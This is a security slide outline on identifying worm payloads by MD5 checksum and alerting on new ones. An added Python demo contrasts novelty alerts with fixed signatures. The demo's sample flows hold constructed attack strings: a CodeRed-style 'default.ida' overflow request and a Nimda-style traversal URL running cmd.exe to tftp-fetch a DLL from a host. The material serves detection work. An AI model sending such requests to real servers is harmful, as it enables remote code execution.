Payload identification

- Originally attempted triage using Snort rules
  - Fixed signatures proved insufficient against changing payloads, e.g. CodeRed truncation, Nimda tftp commands
- Need alerting on new payloads, not on known matches
- Automated alerting via tcpflowd
  - Payloads named by their MD5 checksum
  - Logging proceeds without classification; a payload is recorded whether or not anything recognises it
- Manual triage, aided by ad-hoc TCL and shell scripts
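As an added illustration of the approach on this slide (example code written for this page, not part of the original talk or of tcpflowd), the script below names each captured payload by its MD5 checksum and raises an alert only when that checksum has not been seen before, so a truncated or otherwise varied copy is still logged and flagged even though a fixed signature misses it. The sample flows, the source addresses and the single "ida-overflow" signature are constructed stand-ins, not captured worm traffic or a real Snort rule.

```python
"""Name captured payloads by MD5 and alert on payloads never seen before.

Example written for this page; the flows below are constructed, not captures.
"""
import hashlib
from typing import Dict, Iterable, List, Tuple

# Constructed sample payloads. The first two mimic a long "default.ida?"
# request and a repeat of it, the third a copy truncated mid-request, the
# fourth a tftp fetch command tunnelled through a directory-traversal URL.
SAMPLE_FLOWS: List[Tuple[str, bytes]] = [
    ("10.0.0.5", b"GET /default.ida?" + b"N" * 224 + b"%u9090%u6858 HTTP/1.0\r\n"),
    ("10.0.0.5", b"GET /default.ida?" + b"N" * 224 + b"%u9090%u6858 HTTP/1.0\r\n"),
    ("10.0.0.9", b"GET /default.ida?" + b"N" * 100),  # truncated, no trailer
    ("10.0.0.7", b"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i"
                 b"%2010.0.0.7%20GET%20Admin.dll HTTP/1.0\r\n"),
]

# Hypothetical fixed signature of the kind a Snort rule would carry. It wants
# the full filler plus the trailer, so a truncated copy does not match it.
FIXED_SIGNATURES: Dict[str, bytes] = {
    "ida-overflow": b"N" * 224 + b"%u9090",
}


def signature_match(data: bytes, signatures: Dict[str, bytes] = FIXED_SIGNATURES) -> List[str]:
    """Return the names of every fixed signature found in the payload."""
    return [name for name, pattern in signatures.items() if pattern in data]


def payload_name(data: bytes) -> str:
    """Name a payload by its MD5 checksum, as the slide describes."""
    return hashlib.md5(data).hexdigest()


class NoveltyAlerter:
    """Logs every payload by checksum and flags the ones not seen before."""

    def __init__(self, known: Iterable[str] = ()):
        # checksum -> number of times observed; pre-seeded names count as known
        self.seen: Dict[str, int] = {name: 0 for name in known}
        self.log: List[Tuple[str, str, int]] = []

    def observe(self, src: str, data: bytes) -> Tuple[str, bool]:
        """Record the payload and return (checksum name, is_new)."""
        name = payload_name(data)
        is_new = name not in self.seen
        self.seen[name] = self.seen.get(name, 0) + 1
        # logging happens regardless of whether anything classified the payload
        self.log.append((src, name, len(data)))
        return name, is_new


def run(flows: List[Tuple[str, bytes]] = SAMPLE_FLOWS) -> List[dict]:
    """Process flows in order, reporting novelty and fixed-signature hits."""
    alerter = NoveltyAlerter()
    results = []
    for src, data in flows:
        name, is_new = alerter.observe(src, data)
        results.append({"src": src, "name": name, "new": is_new,
                        "sigs": signature_match(data)})
    return results


if __name__ == "__main__":
    for r in run():
        flag = "NEW " if r["new"] else "seen"
        print(f"{flag} {r['name']} from {r['src']} sigs={r['sigs'] or '-'}")
```

The second flow produces the same checksum as the first and is logged but not alerted; the truncated third flow matches no fixed signature yet gets its own checksum and an alert, which is the behaviour the slide asks for. In practice the `seen` map would be persisted between runs so that known payloads stay quiet across restarts.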